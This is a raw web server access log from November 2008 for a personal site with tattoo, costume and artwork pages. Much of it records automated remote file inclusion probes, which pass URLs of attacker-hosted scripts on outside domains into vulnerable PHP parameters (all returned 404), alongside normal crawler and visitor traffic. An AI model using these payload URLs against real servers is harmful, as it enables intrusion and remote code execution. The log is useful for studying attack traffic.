140.130.101.5 - - [03/Nov/2008:09:28:40 -0600] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
66.197.217.53 - - [03/Nov/2008:09:28:43 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
66.197.217.53 - - [03/Nov/2008:09:28:43 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
66.197.217.53 - - [03/Nov/2008:09:29:15 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
66.197.217.53 - - [03/Nov/2008:09:29:15 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
83.2.108.2 - - [03/Nov/2008:09:30:00 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
83.2.108.2 - - [03/Nov/2008:09:30:00 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
88.84.157.127 - - [03/Nov/2008:09:30:08 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
88.84.157.127 - - [03/Nov/2008:09:30:08 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.55.208.123 - - [03/Nov/2008:09:31:09 -0600] "GET /logs/access_log.1203724800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [03/Nov/2008:09:32:06 -0600] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
190.196.2.205 - - [03/Nov/2008:09:32:24 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:09:32:26 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
65.55.25.135 - - [03/Nov/2008:09:32:42 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [03/Nov/2008:09:32:42 -0600] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.135 - - [03/Nov/2008:09:32:42 -0600] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.2.108.2 - - [03/Nov/2008:09:33:01 -0600] "GET /logs/index.php?function=custom&custom=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
83.2.108.2 - - [03/Nov/2008:09:33:01 -0600] "GET /index.php?function=custom&custom=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
93.186.183.3 - - [03/Nov/2008:09:34:08 -0600] "GET /logs/access_log.1205366400//vwar/backup/errors.php?error=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:09:34:08 -0600] "GET //vwar/backup/errors.php?error=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:09:34:09 -0600] "GET /logs//vwar/backup/errors.php?error=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:34:12 -0600] "GET /logs/access_log.1196035200/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:34:12 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:34:13 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
140.130.101.5 - - [03/Nov/2008:09:34:19 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:09:34:19 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:09:34:19 -0600] "GET /logs/access_log.1216857600//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:09:34:19 -0600] "GET /logs/access_log.1215734400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
190.196.2.205 - - [03/Nov/2008:09:36:09 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:09:36:11 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
80.90.127.34 - - [03/Nov/2008:09:36:42 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
80.90.127.34 - - [03/Nov/2008:09:36:42 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
80.190.202.150 - - [03/Nov/2008:09:36:50 -0600] "GET /logs//vwar/backup/errors.php?error=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
80.190.202.150 - - [03/Nov/2008:09:36:50 -0600] "GET /logs/access_log.1205366400//vwar/backup/errors.php?error=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
80.190.202.150 - - [03/Nov/2008:09:36:50 -0600] "GET //vwar/backup/errors.php?error=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.38.12.204 - - [03/Nov/2008:09:38:02 -0600] "GET /logs/access_log.1216425600/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:38:02 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:38:02 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
80.190.202.150 - - [03/Nov/2008:09:38:21 -0600] "GET /logs/access_log.1208044800//vwar/backup/errors.php?error=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.222.4.51 - - [03/Nov/2008:09:40:58 -0600] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:09:40:58 -0600] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
202.125.46.108 - - [03/Nov/2008:09:41:01 -0600] "GET /logs//main.php?sayfa=http://en.gov.ua/downloads/plans/sb.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.125.46.108 - - [03/Nov/2008:09:41:02 -0600] "GET //main.php?sayfa=http://en.gov.ua/downloads/plans/sb.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.52.255.82 - - [03/Nov/2008:09:41:07 -0600] "GET /logs/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
72.52.255.82 - - [03/Nov/2008:09:41:07 -0600] "GET /purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
70.38.38.231 - - [03/Nov/2008:09:41:23 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.814"
70.38.38.231 - - [03/Nov/2008:09:41:23 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.814"
70.38.38.231 - - [03/Nov/2008:09:41:23 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.814"
70.38.38.231 - - [03/Nov/2008:09:41:23 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.814"
62.48.219.29 - - [03/Nov/2008:09:43:03 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:43:37 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:43:37 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:43:39 -0600] "GET /logs/appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:09:43:39 -0600] "GET /appserv/main.php?appserv_root=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:09:44:06 -0600] "GET /logs/access_log.1208044800//vwar/backup/errors.php?error=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
203.146.26.91 - - [03/Nov/2008:09:45:07 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:09:45:08 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
86.156.132.248 - - [03/Nov/2008:09:45:19 -0600] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.co.uk/search?hl=en&q=anglo+saxon+kings+and+queens+in+the++1000-1100&btnG=Search&meta=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={8F3D3614-0226-4825-A8F0-BEED432B0E70}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
86.156.132.248 - - [03/Nov/2008:09:45:20 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={8F3D3614-0226-4825-A8F0-BEED432B0E70}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
211.115.110.116 - - [03/Nov/2008:09:46:45 -0600] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 319 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.115.110.116 - - [03/Nov/2008:09:46:45 -0600] "GET /logs/access_log.1214179200//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 346 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.115.110.116 - - [03/Nov/2008:09:46:45 -0600] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
190.196.2.205 - - [03/Nov/2008:09:49:33 -0600] "GET /logs/browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
190.196.2.205 - - [03/Nov/2008:09:49:33 -0600] "GET /browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
65.55.208.124 - - [03/Nov/2008:09:50:40 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [03/Nov/2008:09:50:41 -0600] "GET /logs/access_log.1176249600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [03/Nov/2008:09:50:41 -0600] "GET /logs/access_log.1174176000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
79.45.175.236 - - [03/Nov/2008:09:53:45 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.it/search?hl=it&q=vintage+tattoo&btnG=Cerca+con+Google&meta=""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:46 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:46 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:47 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:50 -0600] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:51 -0600] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:51 -0600] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:51 -0600] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:51 -0600] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:51 -0600] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:52 -0600] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:52 -0600] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:52 -0600] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:52 -0600] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:53:52 -0600] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:08 -0600] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:08 -0600] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:08 -0600] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:09 -0600] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:09 -0600] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:09 -0600] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:10 -0600] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:10 -0600] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:10 -0600] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:10 -0600] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:10 -0600] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:19 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:20 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:20 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:20 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:20 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:31 -0600] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:31 -0600] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:31 -0600] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:31 -0600] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:31 -0600] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
79.45.175.236 - - [03/Nov/2008:09:54:32 -0600] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
